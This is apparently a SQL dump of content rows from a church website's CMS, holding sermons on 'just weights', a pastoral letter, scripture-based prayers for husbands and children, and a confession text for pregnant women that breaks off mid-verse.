(31, 'Importance and Significance of Weights or Measures', 'importance-and-significance-of-weights-or-measures', 2, 1, '<p> </p>\r\n<p>Texts: Micah 6:11, Prov. 16:11, Deu.25:13-16</p>\r\n<p>Introduction</p>\r\n<p>Weights could be literal or implied. Literal in terms of things used to get the accurate measure or value of a thing such as scales, tape rule, containers, kegs, bowls, certificate after a course, exam results from one class to the other etc. this enables one to know the level, the true worth and value. A weight is a neutral judge. It simple spells out what is there!</p>\r\n', '\r\n<p>Weights or measures could be implied; just weight may refer to being right, telling the truth, having integrity, innocence, being straight forward, right standard or correct values.</p>\r\n<p>Many people want to pay less and take more, or sell less and collect more money, cheat others, tell lies, pretend, add or remove things for more or illegal gain, change figures, bear false witness; all these may bring more money, more promotion or more physical advancement in physical life but does great damage to the conscience of a man, especially the believer and as he deals with the just weight so is he inside- straight or bent- the money you move from right thing to please the flesh, the more you are shifting from God’s presence to where His life, voice and power can’t reach you. The doctrine of just weight is highly essential.</p>\r\n<p>May you be richly blessed as we go into this series in the name of Jesus.</p>', NULL, NULL, '[]', '', '2017-03-12 16:54:58', 196, '', 0, '0000-00-00 00:00:00', '2017-03-20 17:29:24', 196, '2017-03-12 16:54:58', '0000-00-00 00:00:00', 0, 1, 15, 0, 0, '', '', '', '', 3590, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(32, 'The Christian & Weights', 'the-christian-weights', 2, 1, '<p>Text: 2 Corinthians 13:5-8:  5. Examine yourselves, whether ye be in the faith; prove your own selves. Know ye not your own selves, how that Jesus Christ is in you, except ye be reprobates?. 6 But I trust that ye shall know that we are not reprobates.. 7 Now I pray to God that ye do no evil; not that we should appear approved, but that ye should do that which is honest, though we be as reprobates. 8 For we can do nothing against the truth, but for the truth.</p>\r\n', '\r\n<p><strong>INTRODUCTION</strong></p>\r\n<p>Christian simply means “CHRIST LIKE”. The believers were first called Christians in Antioch (Acts 11:26) when their behaviour, mindset, values and manifestations were seen to be like that of Jesus. And that is how we are supposes to be today.</p>\r\n<p>Your salvation is on three levels and you must experience all for your salvation to be complete.</p>\r\n<p>Instant Salvation: this happens at the time of confession (Rom.10:9-10, John 3:8, 2Cor. 5:17)</p>\r\n<p>Gradual Salvation: Phil.2:12. You have to be saved everyday, separating yourself from things that bring defilement. Gal. 5:16-21, Eph 2:1-22. “Eternal security” i.e. once you are saved, no matter what you do is a wrong doctrine, it is error, and it will take people to hell!</p>\r\n<p>Ultimate Salvation: Matt.24:13, Heb. 3:6, 14. When you overcome till the end then you get saved ultimately, which is God’s goal for your life. The devil wants to stop people at stage one, so they can profess Christianity and still go to hell. Watch out.</p>\r\n<p>The doctrine of just weights helps you to work out your salvation with fear and trembling, getting your life straight before God and your conscience void of offence.</p>\r\n<p><strong>WHO IS A CHRISTIAN?</strong></p>\r\n<ul>\r\n<li>One who has accepted Jesus as his Lord and Saviour (Matt.7:21-24)</li>\r\n<li>One who has become a new creature. (2Cor. 5:17, John 3:8-9)</li>\r\n<li>One who puts God first in all things. (Matt.10:35, Lk.14:18-19, 26, Lk.18:20, Lk.9:59-62.)</li>\r\n<li>One who has chosen God’s kingdom above the world and its glory. (1John 2:15-16, Phil.3:7-10, Col. 3:1, 1Cor.6:2, 2Cor.8:5, Lk.5:11). One who is ready to forsake all.</li>\r\n<li>One who is ready to forsake others for Jesus. (Joshua 24:15, Isa.8:18, Acts 21:9, Heb.11:24-26.)</li>\r\n<li>One who has not defiled himself with what is offered to idols. (Dan.1:8). In our day, the king’s meat means, latest fashion, styles, popular business, practice, relationships, operations that have sin mixed up with them.</li>\r\n<li>One who trembles to keep his conscience pure before God. (James 1:26-27.)</li>\r\n</ul>', NULL, NULL, '[]', '', '2017-03-20 17:29:29', 196, '', 0, '0000-00-00 00:00:00', '2017-03-20 19:52:58', 196, '2017-03-20 17:29:29', '0000-00-00 00:00:00', 0, 1, 1, 0, 0, '', '', '', '', 3375, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(33, 'From our Father\'s Heart (20/03/2017)', 'from-our-father-s-heart-20-03-2017', 5, 1, '<p><strong>Dearly Beloved, </strong></p>\r\n<p><strong>BUILD UP YOUR SPIRIT! </strong></p>\r\n<p>Work to strengthen your spirit man. Recognize that man has a tripartite nature.  There is a need to be strong in your inner man. You are a spirit who has a soul and lives in a body. Your spirit is that part of you that communes with God. If your spirit will be able to lead your body and soul effectively, it must be stronger than your soul and your body.       </p>\r\n', '\r\n<p><strong>Proverbs 18:14</strong></p>\r\n<p>14 The spirit of a man will sustain him in sickness, But who can bear a broken spirit? </p>\r\n<p>It takes a stronger spirit to sustain a man, to lead your soul and body. The soul is your seat of reasoning, will, and emotions; these can take you over and lead you through life. Certain believers are highly cerebral and can almost always explain every move of God away as merely physical occurrences. Such are soulish people. Others are just emotional; their decisions are more emotionally based than spiritual. Emotion-led believers always miss God in life because God is not emotional. God is spiritual. </p>\r\n<p>Steps to strengthen your spirit man include:</p>\r\n<p>1.        Give it life: Getting born-again is the first step to strengthen your spirit man. Getting born-again brings your spirit man alive. You stop being just a body. Your conscience awakens and then you have a template to build on.</p>\r\n<p>2.       Feed your spirit: Matthew 4:4 says, “But He answered and said, ‘It is written, “Man shall not live by bread alone, but by every word that proceeds from the mouth of God.”’” Your spirit needs God’s word to survive. Open up to God’s word. Hear the word, speak the word, confess the word, declare the word, read the word, think on the word, soak it in, memorise the word. Doing these will fatten your spirit and make it robust.</p>\r\n<p>3.       Exercise your spirit: Spend time to exercise your spirit man by praying in the Holy Ghost. Jude 20 says, “But you, beloved, building yourselves up on your most holy faith, praying in the Holy Spirit.” Praying in the Spirit causes your spirit man to rise up stronger like an edifice.</p>\r\n<p>4.       Worship: Spending time to worship God builds up your spirit.</p>\r\n<p>5.       Protect your spirit from pollutions and perversions.</p>\r\n<p>6.       Meditate on God’s word.</p>\r\n<p>Beloved, know that you are more than a body and your spirit man is the leader. However, a weak spirit cannot lead your body and your soul. God’s plan is for you to be strengthened in your inner man. </p>\r\n<p>Prioritize developing your spirit. Your life has many parts but the spiritual side of your life is the foundation upon which all other aspects of your life depend on. The Scripture says, “The spirit of a man will sustain him in sickness, But who can bear a broken spirit (Pro. 18:14)?” Your spirit is the real you. </p>\r\n<p>Every human being has 3 parts – spirit, soul and body – but the spirit is the real man in every Christian and every Christian must understand that he is a spirit that has a soul and lives in a body. Therefore, your spiritual stance and stamina are what determine how the other aspects of your life will stand – whether weak, strong or excellent. The stronger your spirit, the stronger and more influential your life will be. </p>\r\n<p>As a Joseph, you cannot afford to neglect the spirit side of your life. The time you spend to develop your spirit must be a very precious and sacred time to you because it is upon this that all other areas of your life depend. </p>\r\n<p>To take care of your spiritual life you need to be constantly opened to the Father of all spirits, God. He made your spirit and the strength of your spirit as a Christian and as a Joseph will flow from God. You therefore must take time to fellowship with God; fellowship with God’s Word, fellowship with other men with stronger spirits. The Bible talks of the spirit of just men made perfect (Heb. 12:23b). These fellowships are ways to strengthen your spiritual life. You can’t afford to fellowship with stupid and foolish things as a Joseph because these will sap out the strength of your spirit man and reduce your potency in life. </p>\r\n<p>Joseph went through a lot of difficult times but because he had a strong spirit he was able to go through all till he sat on his throne, and the ring and crown were placed on his finger and head respectively. These represent authority and dominion. Only a well-nourished strong spirit can obtain those two. </p>\r\n<p>Till next week, go and win with Jesus        </p>\r\n<p>God\'s Servant,</p>\r\n<p>Rev Olusola Areogun</p>', NULL, NULL, '[]', '', '2017-03-20 17:54:08', 196, '', 0, '0000-00-00 00:00:00', '2017-04-02 08:40:43', 196, '2017-03-20 17:54:08', '0000-00-00 00:00:00', 0, 1, 1, 0, 0, '', '', '', '', 2895, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(34, 'Scriptural Prayers for your Husband', 'prayer', 6, 1, '<p>TEXT: Psalm 128:1-end, 1 Samuel 30, Isaiah 65</p>\r\n<p>Introduction: Stop complaining about your husband, stop quarreling with him, stop getting bitter at him, stop competing against him, stop comparing yourself with him, stop rating him on his weakness and failure, stop comparing him with others that have success that can be seen, stop all malice, bickering and rancour, STOP, STOP, STOP! </p>\r\n', '\r\n<p>What are you to do? PRAY, PRAY, PRAY!!! Your prayers can make all the difference, your prayer of faith (scripture based prayers) can move God and God will move him (Pro 21:1 –quote pls). Stop yelling at him, talk to God… and God will talk to him. When God talks to your husband there will be a greater result that when you talk to him</p>\r\n<p>Below are prayers to pray for your husband.</p>\r\n<p>1, Gen 2:16, Gen 3:9, Gen 4:6,Gen 6:13, Gen 12:1-3, 13:14, 15:1, Gen 26: 2-3,Gen 28:13-16, Exo 3:1-2, Josh 1:1, Acct 9:3-6</p>\r\n<p>Lord appear to him, Lord encounter him, Lord talk to him, Lord direct him, Lord change him as you did for Adam, Noah, Abraham, Isaac, Jacob, Moses, Joshua, Paul. God is no respecter of persons, if He did it in the bible, He will do it today!</p>\r\n<p>2, Psalm 68:6</p>\r\n<p>Lord set him under a God-ordained father among God-fearing friends</p>\r\n<p>3, Gen 18:18-19</p>\r\n<p>Lord work on him to reveal yourself to him-Don’t hide your plan from him. Open his spirit to your revelations, directions and step.</p>\r\n<p>4, Psalm 121:5-8</p>\r\n<p>Divine protection as he goes up and down.</p>\r\n<p>5, 2Chro 18:31, Psalm 68:30</p>\r\n<p>God to move away him destroyers, seducers, deceivers, confusionists etc.</p>\r\n<p>6 Pray Ps 125:3-</p>\r\n<p>  Satan’s rod won’t rest on him at work, at home, in church</p>\r\n<p>7 Psalm 128:1-6</p>\r\n<p>          - He will eat the labour of his hands, due rewards for hard labour (Isaiah 65:21-24). He will be fulfilled, it will be well with him.</p>\r\n<p>          - You will be a fruitful vine for him, your children as olive plants growing well and bringing multiple blessings to the home.</p>\r\n<p>          - Receive for him, his portion out of Zion.</p>\r\n<p>          - He will eat the good and partake of the agenda of God in his days</p>\r\n<p>         - He will see his children’s children.</p>\r\n<p>Finally, Pray the prayers that Abigail prayed for David. (1Sam 25:28-30)</p>\r\n<p>- God to make him a sure house</p>\r\n<p>- God to fight his battles</p>\r\n<p>- God to bind his soul in the bundle of life &amp; sling that of his enemies out.</p>\r\n<p>- God to do for him all the good that He has spoken concerning him.</p>\r\n<p>- God to appoint him a ruler, leader, king.</p>\r\n<p>He will surely remember you as he steps unto the platform of glory God has designed/ordained for him. The more you prayer for him the better he becomes as a husband, father, human being.</p>\r\n<p>Use your weapon of intercession and operate in marital victory!</p>\r\n<p>Sow your seeds of intercession and walk in harvests of sweet marital comfort!</p>\r\n<p>You are blessed.</p>', NULL, NULL, '[]', '', '2017-03-23 16:06:55', 200, '', 0, '0000-00-00 00:00:00', '2017-03-23 16:26:04', 196, '2017-03-23 16:06:55', '0000-00-00 00:00:00', 0, 1, 1, 0, 0, '', '', '', '', 3352, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(35, 'Seven Scriptural Prayers for Victorious Children', 'seven-scriptural-prayers-for-victorious-children', 6, 1, '<p>Text : 1 Samuel 2:22; Genesis 13:7-14, Genesis 39:21; Psalms 46:7, 11; 91:1-16</p>\r\n<p>There are 7 prayer points that I have found to be very important, that will help preserve your children if they are to become victorious in life regardless of whether they are old or young.</p>\r\n', '\r\n<ol>\r\n<li>Pray for your children to have a great spiritual life. A sound and great spiritual life from when they are young and growing up is the greatest inheritance you can leave for your children. How far they can go in the purpose of God for their lives is determined by their relationship with God. What determines the values that will form their philosophy is not how many times you speak to them but who is the Lord of their lives. If it is Jesus Christ that is the Lord of their lives, they will turn out according to the divine plan, or else, the devil will be in charge of how they turn out. Remember the children of Eli in 1 Samuel 2:22.</li>\r\n<li>Pray for your children to have good discernment. Discernment is the ability to judge and discern what is right and what is wrong. The greatest gift you can give your children is not only the instructions but the ability to separate between right and wrong such that when the issues they are confronted with are not clearly written in black and white, they can have good judgment.</li>\r\n<li>Pray for your children to have the right relationships. One bad relationship out of 20 can bring them down and corrupt their future. All it takes to destroy your child and all you have laboured for in your child is to have one bad relationship; it can scatter all your work. Pray for them that they will escape all wrong relationships that the devil has placed on their journey and they will connect to the right relationships that God has ordained for their success.</li>\r\n<li>Pray for your children to make right choices in life: choices about location, career, and marriage. Pray that when the time comes for them to make these choices, they will choose right. Samson missed it in marital choice and he started down the road where he lost his anointing and died with the enemy. Lot chose what seemed good to his eyes (i.e. Sodom and Gomorrah) and he lost the future, his wife, children and all he had. Genesis 13: 7-14</li>\r\n<li>Pray that a shield of favour will surround your children. As your children go through life, they will need favour because everyone needs to have favour where brilliance, strength, or effort will not determine your results in life. Pray that somebody somewhere will treat them like you will treat them or even better. You will agree that we always treat our children with extra care and consideration. If you are the principal of a school, you almost always understand why your own child was a bit late in submitting an assignment but you don’t understand why other children delay. Therefore pray for them to enjoy favour with people they will meet and that they will be treated the way you would have treated them or even more.</li>\r\n<li>Pray for protection for them; Protection in life (Ps 46:7, 11; Ps 91). There is a saying in South West Nigeria that where the eyes of the Lord will not reach, may you never get there. Protection is a very important prayer for children as they all grow up because there will always be a time where you cannot get to where they are but God can and will always be there with them if you commit them to His hands.</li>\r\n<li>Pray against negative ancestral flows (Genesis 49:26): You must actively pray that no negative ancestral flow will creep into the life and experiences of your children. You must start that prayer by refusing those flows in your children and ensuring you are not doing anything to activate those things in your life as their parents. </li>\r\n</ol>\r\n<p>Remember that there are people in your family lines that are the arrow head of the negative ancestral flows in your lineage, and you must know those people and prevent your children from contacting the flows in those people. Not only should you pray for your children because you can’t replace family relationships, but you should also surround them with prayer. Your children may want to go and greet their cousins and if their aunt is the arrow head of the negative female ancestral flows, you can’t stop your child but you can shield your child with prayers.</p>\r\n<p>Lastly, pray Ps 91 and Ps 5:12 over your children today. Plead the blood of Jesus over their lives and experiences. Declare that the blood of Jesus will determine their experiences and not any negative ancestral flow.</p>\r\n<p>NB: Get the Books – God’s plan for your Conception &amp; Delivery, God’s plan for a Nursing Mother</p>\r\n<p> </p>', NULL, NULL, '[]', '', '2017-03-23 16:26:07', 199, '', 0, '0000-00-00 00:00:00', '2017-03-23 20:13:35', 196, '2017-03-23 16:26:07', '0000-00-00 00:00:00', 0, 1, 2, 0, 0, '', '', '', '', 4490, '{\"catItemTitle\":\"\",\"catItemTitleLinked\":\"\",\"catItemFeaturedNotice\":\"\",\"catItemAuthor\":\"\",\"catItemDateCreated\":\"\",\"catItemRating\":\"\",\"catItemImage\":\"\",\"catItemIntroText\":\"\",\"catItemExtraFields\":\"\",\"catItemHits\":\"\",\"catItemCategory\":\"\",\"catItemTags\":\"\",\"catItemAttachments\":\"\",\"catItemAttachmentsCounter\":\"\",\"catItemVideo\":\"\",\"catItemVideoWidth\":\"\",\"catItemVideoHeight\":\"\",\"catItemAudioWidth\":\"\",\"catItemAudioHeight\":\"\",\"catItemVideoAutoPlay\":\"\",\"catItemImageGallery\":\"\",\"catItemImageGalleryWidth\":\"\",\"catItemImageGalleryHeight\":\"\",\"catItemDateModified\":\"\",\"catItemReadMore\":\"\",\"catItemCommentsAnchor\":\"\",\"catItemK2Plugins\":\"\",\"itemDateCreated\":\"\",\"itemTitle\":\"\",\"itemFeaturedNotice\":\"\",\"itemAuthor\":\"\",\"itemFontResizer\":\"\",\"itemPrintButton\":\"\",\"itemEmailButton\":\"\",\"itemSocialButton\":\"\",\"itemVideoAnchor\":\"\",\"itemImageGalleryAnchor\":\"\",\"itemCommentsAnchor\":\"\",\"itemRating\":\"\",\"itemImage\":\"\",\"itemImgSize\":\"\",\"itemImageMainCaption\":\"\",\"itemImageMainCredits\":\"\",\"itemIntroText\":\"\",\"itemFullText\":\"\",\"itemExtraFields\":\"\",\"itemDateModified\":\"\",\"itemHits\":\"\",\"itemCategory\":\"\",\"itemTags\":\"\",\"itemAttachments\":\"\",\"itemAttachmentsCounter\":\"\",\"itemVideo\":\"\",\"itemVideoWidth\":\"\",\"itemVideoHeight\":\"\",\"itemAudioWidth\":\"\",\"itemAudioHeight\":\"\",\"itemVideoAutoPlay\":\"\",\"itemVideoCaption\":\"\",\"itemVideoCredits\":\"\",\"itemImageGallery\":\"\",\"itemImageGalleryWidth\":\"\",\"itemImageGalleryHeight\":\"\",\"itemNavigation\":\"\",\"itemComments\":\"\",\"itemTwitterButton\":\"\",\"itemFacebookButton\":\"\",\"itemGooglePlusOneButton\":\"\",\"itemAuthorBlock\":\"\",\"itemAuthorImage\":\"\",\"itemAuthorDescription\":\"\",\"itemAuthorURL\":\"\",\"itemAuthorEmail\":\"\",\"itemAuthorLatest\":\"\",\"itemAuthorLatestLimit\":\"\",\"itemRelated\":\"\",\"itemRelatedLimit\":\"\",\"itemRelatedTitle\":\"\",\"itemRelatedCategory\":\"\",\"itemRelatedImageSize\":\"\",\"itemRelatedIntrotext\":\"\",\"itemRelatedFulltext\":\"\",\"itemRelatedAuthor\":\"\",\"itemRelatedMedia\":\"\",\"itemRelatedImageGallery\":\"\",\"itemK2Plugins\":\"\"}', '', 'robots=\nauthor=', '', '', '*'),
(36, 'Scriptural Confession for Pregnant Women', 'scriptural-confession', 6, 1, '<p>“Make these scriptures your daily confession at least 3 times daily- morning, afternoon and evening. It can be more! (You can even start before pregnancy).”</p>\r\n<p>Gen. 4:1 – “And Adam knew Eve his wife; and she conceived, and bears Cain, and said, I have gotten a man from the Lord.” Gen. 4:17, Gen. 16:4, Gen. 29:32, 33, 34, 35; Gen. 30:5, 7; Gen. 30:23; Ex.2:29. I conceive and I bare, no miscarriage in Jesus name. Everyone conceived and bare, so do I.</p>\r\n', '\r\n<p>Gen. 25:24- “And when her days to be delivered were fulfilled, behold, there were twins in her womb.” My days to be delivered are fulfilled in Jesus name. Fully-developed-baby comes out-by himself/herself out of my womb.</p>\r\n<p>Gen. 35:17a - “And it came to pass, when she was in hard labor…………..” I come against every hard labor during my delivery. It will be easy for me in Jesus name. My God makes difficult things easy!</p>\r\n<p>Gen. 35:27b-  “………that the midwife said unto her, Fear not; thou shalt have this son also.” I fear not, I have this son also. No still birth in Jesus name.</p>\r\n<p>Ex. 1:19-”And the midwives said unto Pharaoh, because the Hebrew women are not as the Egyptian women; for they are lively, and are delivered ere the midwives come in unto them.” I am a Hebrew woman (Gal. 3:29), I am lively; I am not an unbeliever, without God, without covenant. I deliver without complications in Jesus name.</p>\r\n<p>Ex. 2:2b -”……and when she saw him that he was a goodly child, she hid him three months.” My baby is a goodly child. A child of destiny and great purpose who survives and triumph against all odds. My baby grows perfectly. No deformity.</p>\r\n<p>Isaiah 58:8 – “Then shall thy light break forth as the morning, and thine health shall spring forth speedily: and thy righteousness shall go before thee; the glory of the LORD shall be thy reward.” My health spring forth speedily. I am not sick, I am not weak, I have no pains, I am healthy and strong!</p>\r\n<p>Deut. 28:4,11a; 4a- “Blessed shall be the fruit of thy body,” 11a-”And the LORD shall make thee plenteous in goods, in the fruit of thy body………..” The fruit of my body is blessed. My baby is empowered to do well. No malformation. Not subject to any demonic harassment.</p>\r\n<p>Psalm 139:13-19 – 13 “For thou hast possessed 